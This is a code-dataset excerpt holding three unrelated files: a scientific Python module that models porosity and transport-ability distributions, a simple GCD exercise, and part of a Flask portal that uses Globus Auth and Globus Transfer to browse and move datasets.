self.pmean_trunc = pmean_trunc\n self.pstd_trunc = np.sqrt(pvar_trunc)\n\n return self.pmean_trunc, self.pstd_trunc\n\n\n def connectivity_func(self,\n x,\n por_con_min=0.07,\n por_con_max=0.39,\n fit_con=[27.362,-27.661,9.4256,-0.0927],\n **kwargs):\n\n \"\"\"percolation function: \n for every value of porosity it gives the 
(bernoulli-distributed) value \n of percolation probability\n \"\"\"\n ### calculate percolation function, polynomial coefficients from regression analysis\n pp_range=np.polyval(fit_con,x)\n \n ### add threshold values\n pp1=np.where(x>=por_con_min,pp_range,0)\n pp2=np.where(x<=por_con_max,pp1,1)\n \n return pp2\n\n def pdf_porosity_connected(self,\n x,\n normalize=False,\n **kwargs,\n ):\n\n \"\"\"Calculation of distribution of percolating porosity\n \"\"\"\n \n ### distribution of percolating porosities (not normalized)\n self.pdf_por_con=self.pdf_porosity(x)*self.connectivity_func(x,**kwargs) \n ### norm value of pdf of porosity values, should be 1\n self.connectivity_total=np.trapz(self.pdf_por_con,x=x) \n \n if normalize:\n self.pdf_por_con=self.pdf_por_con/self.connectivity_total\n\n return self.pdf_por_con\n\n\n def pdf_porosity_disconnected(self,\n x,\n normalize=False,\n **kwargs,\n ):\n\n \"\"\"Calculation of distribution of percolating porosity\n \"\"\"\n \n self.pdf_por_discon =self.pdf_porosity(x)*(1-self.connectivity_func(x,**kwargs))\n self.discon_total=np.trapz(self.pdf_por_discon,x=x) \n\n if normalize:\n self.pdf_por_discon=self.pdf_por_discon/self.discon_total\n\n return self.pdf_por_discon\n\n\n \n###############################################################################\n###############################################################################\n###############################################################################\n\nclass TA_POR_Distribution():\n\n \"\"\"\n Class for analysing connected transport ability data distributed over\n a range of porosity values\n \"\"\" \n\n def __init__(self, \n dp = 0.02,\n **kwargs):\n \n self.dp = float(dp)\n \n self.ta = None\n self.ta_con = None\n self.por = None\n self.por_con = None\n\n self.stats = None\n self.por_compress = None\n\n self.check()\n self.porosity_range()\n\n def check(self):\n if self.dp <= 0 or self.dp >=1:\n raise ValueError(\n \"Value of porosity step size must be between 0 and 1\"\n )\n elif self.dp >=0.1:\n print(\"Warning: Value of porosity step size very coarse\")\n\n def porosity_range(self):\n\n \"\"\" Set range of porosity values \"\"\"\n self.por_range=np.arange(0.5*self.dp,1.+0.5*self.dp,self.dp)\n\n return self.por_range\n\n def read_data(self,\n file_data='..data/por_ta_data.csv', ### observed transport abilities vs. 
porosity\n                  compress2con = False,\n                  por_con_min = 0.07,\n                  **kwargs,\n                  ):\n\n        self.por_con_min = por_con_min\n\n        \"\"\" read in ta-data as function of porosity \"\"\"\n\n        if not os.path.isfile(file_data):\n            raise ValueError(\"File for ta-data not accessible: \\n\",file_data)\n        \n        ta_data=np.loadtxt(file_data,delimiter=',')\n\n        if compress2con:\n            \"\"\" compress to data above the connectivity level for porosity \"\"\"\n            por_condition = ta_data[:,0]>=self.por_con_min \n            ta_data = np.compress(por_condition,ta_data,axis=0)\n\n        ta_con_data = np.compress(ta_data[:,1]>0,ta_data,axis=0)\n        \n        self.por_con = np.array(ta_con_data[:,0],ndmin=1)\n        self.ta_con = np.array(ta_con_data[:,1],ndmin=1) \n\n        self.por = np.array(ta_data[:,0],ndmin=1)\n        self.ta = np.array(ta_data[:,1],ndmin=1)\n\n        return self.por,self.ta\n\n    def set_data(self,\n                 ta,\n                 por,\n                 compress2con = False,\n                 por_con_min = 0.07,\n                 **kwargs,\n                 ):\n        \n        self.ta = ta\n        self.por = por\n        self.por_con_min = por_con_min\n        \n        \"\"\" compress to data above the connectivity level for porosity \"\"\"\n        \n        if compress2con:\n            \"\"\" compress to data above the connectivity level for porosity \"\"\"\n            por_condition = (self.por>=self.por_con_min) \n            self.por = np.compress(por_condition,self.por,axis=0)\n            self.ta = np.compress(por_condition,self.ta,axis=0)\n\n        self.ta_con = np.compress(self.ta>0,self.ta,axis=0)\n        self.por_con = np.compress(self.ta>0,self.por,axis=0)\n\n        return self.por,self.ta\n\n    def porosity_bin_data(self,\n                         round_decimals=2,\n                         ):\n\n        \"\"\" re-sort ta-data into the specified porosity bins \"\"\" \n        if self.por_con is None:\n            raise ValueError(\"read or set data first\")\n\n        self.por_bin_data=dict()\n        self.por_bin_logdata=dict()\n        \n        for ip,pi in enumerate(self.por_range): \n            ### determine arguments in list of porosity values being in the range of interest\n            data=np.compress((pi-0.5*self.dp<self.por_con)*(self.por_con<=pi+0.5*self.dp),self.ta_con)\n            self.por_bin_data[pi]=data\n            self.por_bin_logdata[pi]=np.log(data)\n\n        return self.por_bin_data\n\n    def statistics(self,\n                  nmin = 20, \n                  compress = True,\n                  **kwargs,\n                  ):\n\n        \"\"\"\n        Determine statistics on TA distribution for each porosity bin\n\n        Output\n        ------ \n        stats : array containing statistics on perm-distribution for every por-bin of size dpor\n            --> stat values specified in header\n        \"\"\"\n        self.nmin = nmin\n        \n        if self.ta_con is None:\n            raise ValueError(\"read or set data first\")\n\n        self.porosity_range() \n        self.stats=dict()\n        self.stats['porosity']=self.por_range\n        self.stats['number_in_bin'] = np.zeros(len(self.por_range))\n        self.stats['mean'] = np.zeros(len(self.por_range))\n        self.stats['std'] = np.zeros(len(self.por_range))\n        self.stats['skewness'] = np.zeros(len(self.por_range))\n        self.stats['log-mean'] = np.zeros(len(self.por_range))\n        self.stats['log-std'] = np.zeros(len(self.por_range))\n\n        self.porosity_bin_data()\n        \n        for ip,pi in enumerate(self.por_range):\n            \n            ### determine arguments in list of porosity values being in the range of interest\n\n            data=self.por_bin_data[pi]\n            log_data=np.log(data) \n            self.stats['number_in_bin'][ip]=len(data)\n            \n            if len(data)>=self.nmin:\n                self.stats['mean'][ip]=np.mean(data) ### mean of values \n                self.stats['std'][ip]=np.std(data) ### standard deviation of values \n                self.stats['skewness'][ip]=ss.skew(data) ### skewness of values \n                self.stats['log-mean'][ip]=np.mean(log_data) ### mean of log-scaled values \n                self.stats['log-std'][ip]=np.abs(np.std(log_data)) ### standard deviation of log-scaled values \n\n        if compress:\n            
self.stats_compress()\n\n        self.stats_values = np.array(list(self.stats.values())).T\n\n        return self.stats_values,\" , \".join(list(self.stats.keys()))\n\n    def stats_compress(self,\n                      **kwargs,\n                      ):\n\n        \"\"\" compress TA(por) data and statistics to bins of sufficient data \"\"\"\n        \n        if self.stats is None:\n            raise ValueError(\"read data and run statistical analysis first\")\n\n        compress_condition=(self.stats['number_in_bin']>self.nmin)*(self.por_range>self.por_con_min)\n        # print(compress_condition.shape)\n        # print(self.stats['mean'].shape)\n        \n        self.por_compress = np.compress(compress_condition,self.por_range,axis=0)\n\n        self.stats['mean']= np.compress(compress_condition,self.stats['mean'],axis=0)\n        self.stats['std']= np.compress(compress_condition,self.stats['std'],axis=0)\n        self.stats['skewness']= np.compress(compress_condition,self.stats['skewness'],axis=0)\n        self.stats['log-mean']= np.compress(compress_condition,self.stats['log-mean'],axis=0)\n        self.stats['log-std']= np.compress(compress_condition,self.stats['log-std'],axis=0)\n\n        return compress_condition\n\n    def write_stats(self,\n                   file_stats='stats_ta.csv',\n                   delimiter = ',',\n                   fmt = '%.3f',\n                   ):\n\n        \"\"\" Write statistical results to file \"\"\" \n        np.savetxt(file_stats,self.stats_values,header = \" {}\".format(delimiter).join(list(self.stats.keys())),fmt = fmt,delimiter=delimiter)\n\n    def read_stats(self,\n                  file_stats='stats_ta.csv',\n                  delimiter = ',',\n                  ):\n\n        \"\"\" Read statistical results from file \"\"\" \n        \n        self.stats_values = np.loadtxt(file_stats,delimiter=delimiter,skiprows=1)\n        \n    def normality_tests(self,\n                       alpha=0.05,\n                       lognorm=False,\n                       delimiter = ',',\n                       **kwargs,\n                       ):\n\n        \"\"\"\n        Test TA-data in each porosity bin on normality and log-normality\n        \n        \n        Optional\n        --------\n        alpha : p-value level to evaluate as matching normal distribution\n        lognorm : transformation of data to log-normal (check on log-normality)\n        nmin : minimal number of samples in bin to be statistically analysed\n        \n        Output\n        ------ \n        normality : array containing statistics on perm-distribution for every por-bin of size dpor\n            --> stat values specified in header\n        \"\"\"\n\n        # if self.stats is None:\n        self.statistics(compress = False,**kwargs)\n\n        stats_normal=dict()\n        stats_normal['porosity']=self.por_range\n        \n        if lognorm:\n            test_data='log_'\n        else:\n            test_data=''\n\n        tests=['{}shapiro_{:.0f}'.format(test_data,100*alpha),'{}dagostino_{:.0f}'.format(test_data,100*alpha),'{}anderson_15'.format(test_data),'{}anderson_5'.format(test_data),'{}anderson_1'.format(test_data)]\n        for test in tests:\n            stats_normal[test]=np.zeros(len(self.por_range))\n        \n        for ip,pi in enumerate(self.por_range):\n            data=self.por_bin_data[pi]\n#            data=np.compress((pi-0.5*self.dp<self.por_con)*(self.por_con<=pi+0.5*self.dp),self.ta_con)\n            if lognorm:\n                data=np.log(data)\n            \n            if len(data)>=self.nmin:\n                \n                ### Normality testing according to shapiro\n                stat_shapiro_nr,p_shapiro_nr=ss.shapiro(data) \n                #print('Shapiro-Statistics: %.3f, p=%.3f' %(stat_shapiro_nr,p_shapiro_nr)) \n\n                #self.stats['p_shapiro'][ip]=p_shapiro_nr\n                if p_shapiro_nr>alpha:\n                    stats_normal[tests[0]][ip]=1\n                \n                stat_dagostino_nr,p_dagostino_nr=ss.normaltest(data) \n                #print('Dagostino-Statistics: %.3f, p=%.3f' %(stat_dagostino_nr,p_dagostino_nr))\n                #self.stats['p_dagostino'][ip]=p_dagostino_nr\n                if p_dagostino_nr>alpha:\n                    stats_normal[tests[1]][ip]=1\n                \n                stat_AD=ss.anderson(data)\n                #print('Anderson-Darling Test, statistics={:.3f}'.format(stat_AD.statistic))\n                \n                if stat_AD.statistic < 
stat_AD.critical_values[0]:\n #print('sign. level={:.0f}%, critical value={:.3f}: data not normal'.format(sl, cv))\n stats_normal[tests[2]][ip]=1\n #else:\n #print('sign. level={:.0f}%,critical value={:.3f}: data looks normal '.format(sl, cv))\n if stat_AD.statistic < stat_AD.critical_values[2]:\n stats_normal[tests[3]][ip]=1\n if stat_AD.statistic < stat_AD.critical_values[4]:\n stats_normal[tests[4]][ip]=1\n\n else:\n for test in tests:\n stats_normal[test][ip]=2\n\n self.stats.update(stats_normal)\n self.stats_values = np.array(list(self.stats.values())).T\n\n return stats_normal\n # return np.array(list(stats_normal.values())).T,'porosity {} {}'.format(delimiter, \" {} \".format(delimiter).join(tests))\n\n def fit_stats2por(self,\n fitting='ta_fit_poly',\n por_min=0,\n **kwargs,\n ):\n\n \"\"\"\n fit log-TA statistics (log-mean, log-std) to polynomial function of por\n \"\"\"\n \n # if self.stats is None:\n self.statistics(compress = False,**kwargs)\n \n if fitting == 'ta_fit_poly':\n self.ta_fit=dict(\n mean_deg = 2,\n std_deg = 3, \n )\n elif fitting == 'ta_fit_adapt':\n self.ta_fit=dict(\n mean_deg = 1,\n std_deg = 3, \n ) \n else:\n self.ta_fit=fitting\n\n ### Reduce to data which is has sufficient data points (len(data)>nmin) and is above percolation threshold (por>por_min)\n compress_condition=(self.stats['number_in_bin']>self.nmin)*(self.por_range>por_min)\n \n por_cond = np.compress(compress_condition,self.por_range,axis=0)\n mean_cond = np.compress(compress_condition,self.stats['log-mean'],axis=0)\n std_cond = np.compress(compress_condition,self.stats['log-std'],axis=0)\n \n \"\"\" fit of mean according to specified fitting function \"\"\"\n if fitting == 'ta_fit_poly': \n ### Polynomial fitting according to choice of degree of polynomial\n fp1=np.polyfit(por_cond, mean_cond,deg=self.ta_fit['mean_deg'])\n mean_fit=np.polyval(fp1,self.por_range)\n mean_fit [mean_fit>0] = 0\n self.ta_fit['mean_coeff'] = fp1\n self.ta_fit['mean_fit'] = mean_fit # mean values of ta for por_range given fitting function\n\n self.ta_fit['por_min'] = np.compress(compress_condition,self.por_range)[0] # minimum porosity where fit is valid\n self.ta_fit['por_max'] = np.compress(compress_condition,self.por_range)[-1] # maximum porosity where fit is valid\n\n elif fitting =='ta_fit_adapt': \n ### Polynomial fitting according to choice of degree of polynomial\n mean_adapt = np.where(por_cond >0,mean_cond/(1 - por_cond),0)\n fp1=np.polyfit(por_cond,mean_adapt ,deg=self.ta_fit['mean_deg'])\n mean_fit=(1-self.por_range)*np.polyval(fp1,self.por_range)\n\n self.ta_fit['mean_coeff'] = fp1\n self.ta_fit['mean_fit'] = mean_fit # mean values of ta for por_range given fitting function\n\n else:\n print('Fitting type not specified')\n\n \"\"\" fitting of variance \"\"\"\n fp2=np.polyfit(por_cond,std_cond,deg=self.ta_fit['std_deg'])\n std_fit=np.polyval(fp2,self.por_range) \n std_fit = np.where(compress_condition,std_fit,0)\n std_fit [std_fit<0] = 0\n self.ta_fit['std_coeff'] = fp2\n self.ta_fit['std_fit'] = std_fit # std values of ta for por_range given fitting function\n\n\n def interpolate_ta_log_mean(self,\n px=False,\n **kwargs,\n ):\n\n \"\"\" mu_TA(por): \n create function of log-mean for TA values as function of porosity values, either\n - specified range px (e.g. 
at finer resolution)\n - using the compressed porosity values (px = False) \n \"\"\"\n \n # if self.stats is None:\n self.statistics(compress=True,**kwargs)\n\n if px is False:\n px = self.por_compress\n\n mean_adapt = self.stats['log-mean']/(1 - self.por_compress)\n fp1=np.polyfit(self.por_compress,mean_adapt ,deg=1)\n\n self.ta_log_mean_por=(1-px)*np.polyval(fp1,px)\n\n return self.ta_log_mean_por\n\n def interpolate_ta_log_std(self,\n px=False,\n **kwargs,\n ):\n\n \"\"\" sigma_TA(por): \n create function of log-std for TA values as function of porosity values, either\n - specified range px (e.g. at finer resolution)\n - using the compressed porosity values (px = False) \n \"\"\"\n\n \"\"\" fitting of variance \"\"\"\n # if self.stats is None:\n self.statistics(compress=True,**kwargs)\n\n if px is False:\n px = self.por_compress\n\n fp2=np.polyfit(self.por_compress,self.stats['log-std'],deg=3)\n std_fit=np.hstack([[0],np.polyval(fp2,self.por_compress),[0]])\n por_fit = np.hstack([[0],self.por_compress,[1]])\n\n self.ta_log_std_por=np.interp(px,por_fit,std_fit)\n\n return self.ta_log_std_por\n\n def rvs_ta(self, \n sample_data = False, \n nrand = 1600 , \n **kwargs,\n ):\n\n \"\"\"\n random sampling of ta values from\n - log-normal distribution (sample_data = False) using mean and var determined from log-data\n - directly from data by using the log-data as sample distribution\n \n random values are samples in log-transformed space (exponent) and transformed into data space \n \"\"\"\n\n\n self.interpolate_ta_log_mean(px = self.por_range,**kwargs)\n self.interpolate_ta_log_std(px = self.por_range,**kwargs)\n compress_condition=(self.stats['number_in_bin']>self.nmin)*(self.por_range>self.por_con_min)\n \n ta_rand_values = np.ones([len(self.por_range),nrand])\n for ip,pi in enumerate(self.por_range): \n if compress_condition[ip]: \n\n if sample_data:\n hist = np.histogram(self.por_bin_logdata[pi], bins=self.nmin) \n hist_dist = ss.rv_histogram(hist) \n ta_rand_values[ip,:] = hist_dist.rvs(size = [nrand])\n \n else:\n ta_rand_values[ip,:] = ss.norm.rvs(loc = self.ta_log_mean_por[ip],scale = self.ta_log_std_por[ip],size =[nrand])\n \n else:\n ### porosity values with not sufficient data\n ta_rand_values[ip,:] = self.ta_log_mean_por[ip]\n \n return np.exp(ta_rand_values)\n\n def pdf_ta_con(self,\n tay,\n px = False,\n **kwargs,\n ):\n \n \"\"\" generate log-normal pdf of TA-values (in resolution tay) for each porosity value \n compressed data range \n \"\"\"\n\n self.interpolate_ta_log_mean(px=px,**kwargs)\n self.interpolate_ta_log_std(px=px,**kwargs)\n \n if px is False:\n px = self.por_compress\n \n pdf = np.zeros((len(px),len(tay)))\n\n for ip in range(len(px)): \n if px[ip] == 0:\n pdf[ip,:] = 0\n else:\n pdf[ip,:]=ss.lognorm.pdf(tay,s=self.ta_log_std_por[ip],scale=np.exp(self.ta_log_mean_por[ip]))\n \n self.pdf_ta_con = pdf\n return self.pdf_ta_con\n\n def connectivity_distribution(self,\n compress = True,\n ):\n\n \"\"\" por-resolution level (from data):\n analysis of connectivity of TA-values distributed for porosity values\n --> percolation function of particular ensemble\n \"\"\"\n \n pcon = 2*np.ones(len(self.por_range))\n for ip,pi in enumerate(self.por_range): \n ### determine arguments in list of porosity values being in the range of interest\n data=np.compress((pi-0.5*self.dp<self.por)*(self.por<=pi+0.5*self.dp),self.ta)\n if len(data)>0:\n pcon[ip] = np.mean(data>0) \n\n if compress:\n \"\"\" compress to data above the connectivity level for porosity \"\"\"\n condition = 
pcon<2\n self.pcon_data = np.compress(condition,pcon)\n px = np.compress(condition,self.por_range)\n else:\n self.pcon_data = pcon\n px = self.por_range\n \n return self.pcon_data, px\n\n \n###############################################################################\n###############################################################################\n###############################################################################\n\nclass TA_Distribution():\n\n def __init__(self, \n dim = 2,\n ta_gmean = 0.022, \n ta_log_std = 2, \n ta_pcon = 1,\n **settings):\n\n self.dim = dim\n self.ta_gmean = ta_gmean\n self.ta_log_std = ta_log_std \n self.ta_pcon = ta_pcon\n \n def pdf_ta_con(self,tay):\n\n \"\"\" ensemble level (theory):\n log-normal pdf of TA-values based on scale-dependent mean and std \n of log-ta data from upscaling theory\n (marginal distribution of ta-por-scatter) \n \"\"\"\n\n self.pdf_ta_con= ss.lognorm.pdf(tay, s = self.ta_log_std, scale = self.ta_gmean)\n\n return self.pdf_ta_con\n\n def pdf_ta(self,tay):\n\n \"\"\" ensemble level (theory):\n log-normal pdf of TA-values based on scale-dependent mean and std \n of log-ta data from upscaling theory\n (marginal distribution of ta-por-scatter) \n \"\"\"\n self.pdf_ta_con(tay)\n\n self.pdf_ta = self.pdf_ta_con*self.ta_pcon\n self.pdf_ta[0] = 1-self.ta_pcon \n \n return self.pdf_ta\n\n def moments_ta(self):\n \n ### expectation value for adapted probability distrubtion including non-connected values\n self.ta_1moment = self.ta_pcon*self.ta_gmean*np.exp(0.5*self.ta_log_std**2)\n ### variance value for adapted probability distrubtion including non-connected values\n self.ta_2moment = self.ta_pcon*self.ta_gmean**2*np.exp(self.ta_log_std**2)*(np.exp(self.ta_log_std**2)-self.ta_pcon)\n\n return self.ta_1moment,self.ta_2moment\n\n","repo_name":"AlrauneZ/TransportAbility","sub_path":"src/Distributions.py","file_name":"Distributions.py","file_ext":"py","file_size_in_byte":26208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"7336947964","text":"'''\n(Compute GCD) Write a function that returns the greatest common divisor\n(GCD) of integers in a list. 
Use the following function header:\ndef gcd(numbers):\nWrite a test program that prompts the user to enter five numbers, invokes the\nfunction to find the GCD of these numbers, and displays the GCD.\n'''\n\ndef gcd(numbers):\n answer = numbers[0]\n for m in numbers[1:]:\n x = answer\n y = m\n while y >0:\n x, y =y, x%y\n\n answer = x\n\n return answer\n\n\ndef main():\n numbers = []\n print(\"Enter 5 numbers and press enter after entering each number to find GCD:\")\n for i in range(0, 5):\n elem = int(input())\n numbers.append(elem)\n\n\n answer = gcd(numbers)\n print(\"The GCD is: \", answer)\n\n\nmain()\n","repo_name":"abccba123/my_projects","sub_path":"Chp10_12.py","file_name":"Chp10_12.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23416317878","text":"import requests\nfrom flask import (abort, flash, redirect, render_template, request, session,\n url_for)\nfrom globus_sdk import (RefreshTokenAuthorizer, TransferAPIError,\n TransferClient, TransferData)\n\nfrom portal import app, database, datasets\nfrom portal.decorators import authenticated\nfrom portal.utils import (get_portal_tokens, get_safe_redirect,\n load_portal_client)\n\ntry:\n from urllib.parse import urlencode\nexcept ImportError:\n from urllib import urlencode\n\n\n@app.route('/', methods=['GET'])\ndef home():\n if 'source_endpoint' not in session:\n session['source_endpoint'] = 1\n return render_template('home.jinja2')\n\n\n@app.route('/doc/<doc_name>')\ndef render_doc(doc_name):\n return render_template('doc_template.jinja2', doc_name=doc_name)\n\n@app.route('/signup', methods=['GET'])\ndef signup():\n \"\"\"Send the user to Globus Auth with signup=1.\"\"\"\n return redirect(url_for('authcallback', signup=1))\n\n\n@app.route('/login', methods=['GET'])\ndef login():\n \"\"\"Send the user to Globus Auth.\"\"\"\n return redirect(url_for('authcallback'))\n\n\n@app.route('/logout', methods=['GET'])\n@authenticated\ndef logout():\n \"\"\"\n - Revoke the tokens with Globus Auth.\n - Destroy the session state.\n - Redirect the user to the Globus Auth logout page.\n \"\"\"\n client = load_portal_client()\n\n # Revoke the tokens with Globus Auth\n for token, token_type in (\n (token_info[ty], ty)\n # get all of the token info dicts\n for token_info in session['tokens'].values()\n # cross product with the set of token types\n for ty in ('access_token', 'refresh_token')\n # only where the relevant token is actually present\n if token_info[ty] is not None):\n client.oauth2_revoke_token(\n token, additional_params={'token_type_hint': token_type})\n\n # Destroy the session state\n session.clear()\n\n redirect_uri = url_for('home', _external=True)\n\n ga_logout_url = []\n ga_logout_url.append(app.config['GLOBUS_AUTH_LOGOUT_URI'])\n ga_logout_url.append('?client={}'.format(app.config['PORTAL_CLIENT_ID']))\n ga_logout_url.append('&redirect_uri={}'.format(redirect_uri))\n ga_logout_url.append('&redirect_name=LSSTDESC Data Portal')\n\n # Redirect the user to the Globus Auth logout page\n return redirect(''.join(ga_logout_url))\n\n\n@app.route('/profile', methods=['GET', 'POST'])\n@authenticated\ndef profile():\n \"\"\"User profile information. 
Assocated with a Globus Auth identity.\"\"\"\n if request.method == 'GET':\n identity_id = session.get('primary_identity')\n profile = database.load_profile(identity_id)\n\n if profile:\n name, email, institution, source_endpoint = profile\n\n session['name'] = name\n session['email'] = email\n session['institution'] = institution\n session['source_endpoint'] = source_endpoint\n else:\n flash(\n 'Please complete any missing profile fields and press Save.')\n\n if request.args.get('next'):\n session['next'] = get_safe_redirect()\n\n return render_template('profile.jinja2')\n elif request.method == 'POST':\n print(\"inside profile post\")\n name = session['name'] = request.form['name']\n email = session['email'] = request.form['email']\n institution = session['institution'] = request.form['institution']\n source_endpoint = session['source_endpoint'] = int(request.form['endpoint'])\n\n database.save_profile(identity_id=session['primary_identity'],\n name=name,\n email=email,\n institution=institution,\n source_endpoint=int(source_endpoint))\n\n flash('Thank you! Your profile has been successfully updated.')\n\n if 'next' in session:\n redirect_to = session['next']\n session.pop('next')\n else:\n redirect_to = url_for('profile')\n\n return redirect(redirect_to)\n\n\n@app.route('/authcallback', methods=['GET'])\ndef authcallback():\n \"\"\"Handles the interaction with Globus Auth.\"\"\"\n # If we're coming back from Globus Auth in an error state, the error\n # will be in the \"error\" query string parameter.\n if 'error' in request.args:\n flash(\"You could not be logged into the portal: \" +\n request.args.get('error_description', request.args['error']))\n return redirect(url_for('home'))\n\n # Set up our Globus Auth/OAuth2 state\n # AUTHCALLBACK_SCHEME=\"https\" allows portal to run behind SSL-terminating\n # reverse proxy or ingress.\n redirect_uri = url_for(\n 'authcallback',\n _external=True,\n _scheme=app.config.get(\"AUTHCALLBACK_SCHEME\")\n )\n\n client = load_portal_client()\n client.oauth2_start_flow(\n redirect_uri,\n refresh_tokens=True,\n requested_scopes=app.config['USER_SCOPES']\n )\n\n # If there's no \"code\" query string parameter, we're in this route\n # starting a Globus Auth login flow.\n if 'code' not in request.args:\n additional_authorize_params = (\n {'signup': 1} if request.args.get('signup') else {})\n\n auth_uri = client.oauth2_get_authorize_url(\n additional_params=additional_authorize_params)\n\n return redirect(auth_uri)\n else:\n # If we do have a \"code\" param, we're coming back from Globus Auth\n # and can start the process of exchanging an auth code for a token.\n code = request.args.get('code')\n tokens = client.oauth2_exchange_code_for_tokens(code)\n\n id_token = tokens.decode_id_token(client)\n session.update(\n tokens=tokens.by_resource_server,\n is_authenticated=True,\n name=id_token.get('name', ''),\n email=id_token.get('email', ''),\n institution=id_token.get('organization', ''),\n primary_username=id_token.get('preferred_username'),\n primary_identity=id_token.get('sub'),\n )\n\n profile = database.load_profile(session['primary_identity'])\n\n if profile:\n name, email, institution, source_endpoint = profile\n\n session['name'] = name\n session['email'] = email\n session['institution'] = institution\n session['source_endpoint'] = source_endpoint\n else:\n return redirect(url_for('profile',\n next=url_for('transfer')))\n\n return redirect(url_for('transfer'))\n\n\n@app.route('/browse', methods=['GET', 
'POST'])\n@app.route('/browse/dataset/<dataset_id>', methods=['GET', 'POST'])\n@app.route('/browse/endpoint/<endpoint_id>/<path:endpoint_path>',\n methods=['GET', 'POST'])\n@authenticated\ndef browse(dataset_id=None, endpoint_id=None, endpoint_path=None):\n \"\"\"\n - Get list of files for the selected dataset or endpoint ID/path\n - Return a list of files to a browse view\n\n The target template (browse.jinja2) expects an `endpoint_uri` (if\n available for the endpoint), `target` (either `\"dataset\"`\n or `\"endpoint\"`), and 'file_list' (list of dictionaries) containing\n the following information about each file in the result:\n\n {'name': 'file name', 'size': 'file size', 'id': 'file uri/path'}\n\n If you want to display additional information about each file, you\n must add those keys to the dictionary and modify the browse.jinja2\n template accordingly.\n \"\"\"\n\n if request.method == 'GET':\n assert bool(dataset_id) != bool(endpoint_id and endpoint_path)\n\n if dataset_id:\n try:\n dataset = next(ds for ds in datasets if ds['id'] == dataset_id)\n except StopIteration:\n abort(404)\n\n endpoint_id = app.config['NERSC_ENDPOINT_ID'] if session['source_endpoint'] else app.config['ANL_ENDPOINT_ID']\n endpoint_path = (app.config['NERSC_ENDPOINT_BASE'] + dataset['path']) if session['source_endpoint'] else (app.config['ANL_ENDPOINT_BASE'] + dataset['path'])\n # endpoint_id = app.config['DATASET_ENDPOINT_ID'] \n # endpoint_path = app.config['DATASET_ENDPOINT_BASE'] + dataset['path']\n\n else:\n endpoint_path = '/' + endpoint_path\n\n transfer_tokens = session['tokens']['transfer.api.globus.org']\n\n authorizer = RefreshTokenAuthorizer(\n transfer_tokens['refresh_token'],\n load_portal_client(),\n access_token=transfer_tokens['access_token'],\n expires_at=transfer_tokens['expires_at_seconds'])\n\n transfer = TransferClient(authorizer=authorizer)\n\n try:\n transfer.endpoint_autoactivate(endpoint_id)\n listing = transfer.operation_ls(endpoint_id, path=endpoint_path)\n except TransferAPIError as err:\n flash('Error [{}]: {}'.format(err.code, err.message))\n return redirect(url_for('transfer'))\n\n file_list = [e for e in listing if e['type'] == 'file']\n if dataset_id and 'example' in dataset:\n for e in file_list:\n e['is_example_set'] = (e['name'] in dataset['example'])\n\n ep = transfer.get_endpoint(endpoint_id)\n\n https_server = ep['https_server']\n endpoint_uri = https_server + endpoint_path if https_server else None\n webapp_xfer = 'https://app.globus.org/file-manager?' 
+ \\\n urlencode(dict(origin_id=endpoint_id, origin_path=endpoint_path))\n\n return render_template('browse.jinja2', endpoint_uri=endpoint_uri,\n target=\"dataset\" if dataset_id else \"endpoint\",\n description=(dataset['name'] if dataset_id\n else ep['display_name']),\n mypath=(dataset['path'] if dataset_id\n else None),\n myid=(dataset['id'] if dataset_id\n else None),\n has_example_set=(dataset_id and 'example' in dataset),\n doc_name=(dataset.get(\"doc_name\") if dataset_id else None),\n file_list=file_list, webapp_xfer=webapp_xfer)\n\n if request.method == 'POST':\n if not request.form.get('file'):\n flash('Please select at least one file.')\n return redirect(url_for('browse', dataset_id=dataset_id))\n\n params = {\n 'method': 'POST',\n 'action': url_for('submit_transfer', _external=True,\n _scheme='https'),\n 'filelimit': 0,\n 'folderlimit': 1\n }\n\n browse_endpoint = 'https://app.globus.org/file-manager?{}' \\\n .format(urlencode(params))\n\n session['form'] = {\n 'dirselect': False,\n 'datasets': request.form.getlist('file'),\n 'path': request.form.getlist('path'),\n 'id': request.form.getlist('id')\n }\n\n return redirect(browse_endpoint)\n\n\n@app.route('/transfer', methods=['GET', 'POST'])\n@authenticated\ndef transfer():\n \"\"\"\n - Save the submitted form to the session.\n - Send to Globus to select a destination endpoint using the\n Browse Endpoint helper page.\n \"\"\"\n if request.method == 'GET':\n return render_template('transfer.jinja2', datasets=datasets)\n\n if request.method == 'POST':\n if not request.form.get('dataset'):\n flash('Please select at least one dataset.')\n return redirect(url_for('transfer'))\n\n params = {\n 'method': 'POST',\n 'action': url_for('submit_transfer', _external=True,\n _scheme='https'),\n 'filelimit': 0,\n 'folderlimit': 1\n }\n\n browse_endpoint = 'https://app.globus.org/file-manager?{}' \\\n .format(urlencode(params))\n\n session['form'] = {\n 'dirselect': True,\n 'datasets': request.form.getlist('dataset')\n }\n\n return redirect(browse_endpoint)\n\n\n@app.route('/submit-transfer', methods=['POST'])\n@authenticated\ndef submit_transfer():\n \"\"\"\n - Take the data returned by the Browse Endpoint helper page\n and make a Globus transfer request.\n - Send the user to the transfer status page with the task id\n from the transfer.\n \"\"\"\n browse_endpoint_form = request.form\n\n dirselect = session['form']['dirselect']\n selected = session['form']['datasets']\n if dirselect:\n filtered_datasets = [ds for ds in datasets if ds['id'] in selected]\n else:\n path = session['form']['path']\n myid = session['form']['id']\n filtered_datasets = [{'name':name, 'path': path, 'id': myid}\n for name, path, myid in zip(selected, path, myid)\n ]\n\n transfer_tokens = session['tokens']['transfer.api.globus.org']\n\n authorizer = RefreshTokenAuthorizer(\n transfer_tokens['refresh_token'],\n load_portal_client(),\n access_token=transfer_tokens['access_token'],\n expires_at=transfer_tokens['expires_at_seconds'])\n\n transfer = TransferClient(authorizer=authorizer)\n\n #source_endpoint_id = app.config['DATASET_ENDPOINT_ID']\n #source_endpoint_base = app.config['DATASET_ENDPOINT_BASE']\n source_endpoint_id = app.config['NERSC_ENDPOINT_ID'] if session['source_endpoint'] else app.config['ANL_ENDPOINT_ID']\n source_endpoint_base = app.config['NERSC_ENDPOINT_BASE'] if session['source_endpoint'] else app.config['ANL_ENDPOINT_BASE']\n destination_endpoint_id = browse_endpoint_form['endpoint_id']\n destination_folder = browse_endpoint_form.get('folder[0]')\n\n 
